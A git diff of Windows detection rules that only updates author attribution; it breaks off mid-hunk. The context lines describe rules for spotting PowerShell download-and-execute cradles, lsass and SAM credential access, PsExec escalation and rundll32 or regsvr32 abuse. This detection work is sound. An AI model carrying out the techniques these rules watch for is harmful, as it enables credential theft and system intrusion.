diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml
index 233b9fbe1..1ad9bade3 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression
 references:
 - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/24
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml
index f17f3798b..bde271965 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191
 - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178
 - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/04/20
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml
index ee0f6a3a2..1ffc21899 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
 references:
 - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/05/24
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml
index 411a4258a..41d5e49fc 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
 references:
 - https://twitter.com/PythonResponder/status/1385064506049630211
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/04/23
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml
index 10496ed6c..13e2d5b22 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious ways to run Invoke-Execution using IEX alias
 references:
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/24
 modified: 2022/11/28
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml
index 576b5a1c7..79cce4ba6 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml
@@ -9,7 +9,7 @@ related:
 type: similar
 status: experimental
 description: Detects suspicious PowerShell invocation command parameters
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/05
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml
index 719342b7c..db2d56c27 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious encoded character syntax often used for defense evasion
 references:
 - https://twitter.com/0gtweet/status/1281103918693482496
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/09
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml
index 8c1392850..d450ee181 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious PowerShell scripts accessing SAM hives
 references:
 - https://twitter.com/splinter_code/status/1420546784250769408
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/29
 modified: 2023/01/06
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml
index d17c4f684..c8b04c202 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious powershell invocations from interpreters or unusual programs
 references:
 - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/16
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml
index ca500b437..594616514 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious child processes spawned by PowerShell
 references:
 - https://twitter.com/ankit_anubhav/status/1518835408502620162
-author: Florian Roth, Tim Shelton
+author: Florian Roth (Nextron Systems), Tim Shelton
 date: 2022/04/26
 modified: 2023/01/05
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml
index 9445f3367..5fdc0c8b1 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
 references:
 - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/05/24
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml
index c8dce3fd0..6d59951ce 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
 references:
 - https://twitter.com/mrd0x/status/1463526834918854661
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/11
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml b/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml
index b6296c627..f2fcac60c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/10/30
 modified: 2022/08/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml b/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml
index 504b362cb..8e96d4e03 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml
@@ -6,7 +6,7 @@ references:
 - https://processhacker.sourceforge.io/
 - https://github.com/winsiderss/systeminformer
 - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/10/10
 modified: 2022/12/30
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_progname.yml b/rules/windows/process_creation/proc_creation_win_susp_progname.yml
index 315a621d6..88680395c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_progname.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_progname.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/11
 logsource:
 category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml b/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml
index a35b5e770..175f4b781 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious command line execution that invokes PowerShell
 references:
 - https://twitter.com/JohnLaTwC/status/1082851155481288706
 - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
-author: Florian Roth, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
 date: 2019/01/09
 modified: 2022/07/14
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml b/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml
index d085225c5..d3bbeb15e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
 references:
 - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/08/28
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml b/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml
index a980cfc51..e33804f13 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
 references:
 - https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
index 14a3ff9bf..4421be335 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
 references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/21
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml
index 5732b16d6..c5859f891 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml
@@ -5,7 +5,7 @@ description: Detects suspicious launch of a renamed version of the PSEXESVC serv
 references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
 - https://www.youtube.com/watch?v=ro2QuZTIMBM
-author: FLorian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/21
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml
index ec93b3203..d75bab36a 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml
@@ -9,7 +9,7 @@ references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
 - https://www.poweradmin.com/paexec/
 - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2021/11/23
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml
index ba727cd67..686aa98aa 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml
@@ -9,7 +9,7 @@ references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
 - https://www.poweradmin.com/paexec/
 - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2021/05/22
 modified: 2022/10/06
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml b/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml
index 9ff176fb9..eb5bcd295 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml
@@ -7,7 +7,7 @@ references:
 - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos
 - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList
 - https://twitter.com/EricaZelic/status/1614075109827874817
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2021/12/18
 modified: 2023/01/16
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml
index 63cd4722c..28ed9c1ec 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml
@@ -5,7 +5,7 @@ description: Detects a explorer.exe sub process of the RazerInstaller software w
 references:
 - https://twitter.com/j0nh4t/status/1429049506021138437
 - https://streamable.com/q2dsji
-author: Florian Roth, Maxime Thiebaut
+author: Florian Roth (Nextron Systems), Maxime Thiebaut
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml b/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml
index 792bba63b..b041e1e8e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a set of suspicious network related commands often used in recon stages
 references:
 - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/07
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml
index 4c75a6f71..73c55dd89 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1
 - https://vms.drweb.fr/virus/?i=24144899
 - https://bidouillesecurity.com/disable-windows-defender-in-powershell/
-author: Florian Roth, John Lambert (idea), elhoim
+author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
 date: 2021/07/14
 modified: 2022/05/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml b/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml
index 9aff7aa42..086e7d4e7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
 references:
 - https://twitter.com/1kwpeter/status/1397816101455765504
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/27
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
index 9634b5e92..fb0a2ae7b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
@@ -5,7 +5,7 @@ description: Detects various anomalies in relation to regsvr32.exe
 references:
 - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html
 - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
-author: Florian Roth, oscd.community, Tim Shelton
+author: Florian Roth (Nextron Systems), oscd.community, Tim Shelton
 date: 2019/01/16
 modified: 2022/09/21
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml
index 0c1f1bc78..f09267f9e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time
 references:
 - https://twitter.com/sbousseaden/status/1282441816986484737?s=12
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/07/13
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml
index 8ccd91eef..715d87889 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml
@@ -5,7 +5,7 @@ description: Detects a certain command line flag combination used by regsvr32 wh
 references:
 - https://twitter.com/mrd0x/status/1461041276514623491c19-ps
 - https://twitter.com/tccontre18/status/1480950986650832903
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/11
 modified: 2023/01/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml
index a74ed1de0..32603fb9a 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line
 references:
 - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/07/17
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml
index 81722239d..df740e4fc 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects REGSVR32.exe to execute DLL hosted on remote shares
 references:
 - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/31
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml
index 2eb10b892..e79d1b756 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml
@@ -9,7 +9,7 @@ references:
 - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
 - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
 - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/21
 modified: 2022/11/01
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
index 1fe5e9242..ed6ea8c99 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
@@ -5,7 +5,7 @@ description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility
 references:
 - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
 - https://twitter.com/bopin2020/status/1366400799199272960
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/20
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml
index 492c2bb21..c80685a81 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/gN3mes1s/status/1222088214581825540
 - https://twitter.com/gN3mes1s/status/1222095963789111296
 - https://twitter.com/gN3mes1s/status/1222095371175911424
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/01/28
 modified: 2021/12/08
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml
index 9e0f2b328..283c0d520 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious renamed SysInternals DebugView execution
 references:
 - https://www.epicturla.com/blog/sysinturla
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/28
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml
index 8f13a3765..a5c6d3fd0 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects execution of renamed version of PAExec. Often used by attackers
 references:
 - https://www.poweradmin.com/paexec/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/22
 modified: 2022/10/26
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml
index d0285fd93..765ed19a0 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/Neo23x0/DLLRunner
 - https://twitter.com/cyb3rops/status/1186631731543236608
 - https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/22
 modified: 2022/12/04
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml
index 69a1bbe9d..2815cf47f 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
 references:
 - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/05
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml
index 4512432ae..04b77fd79 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code
 references:
 - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/14
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml
index cc9dcdff0..1bb6a8373 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
 references:
 - https://twitter.com/NinjaParanoid/status/1516442028963659777
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/21
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml
index 603780101..c75edce38 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
 references:
 - https://www.cobaltstrike.com/help-opsec
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/27
 modified: 2022/10/06
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml
index 6b2780776..b3ca0324b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
 references:
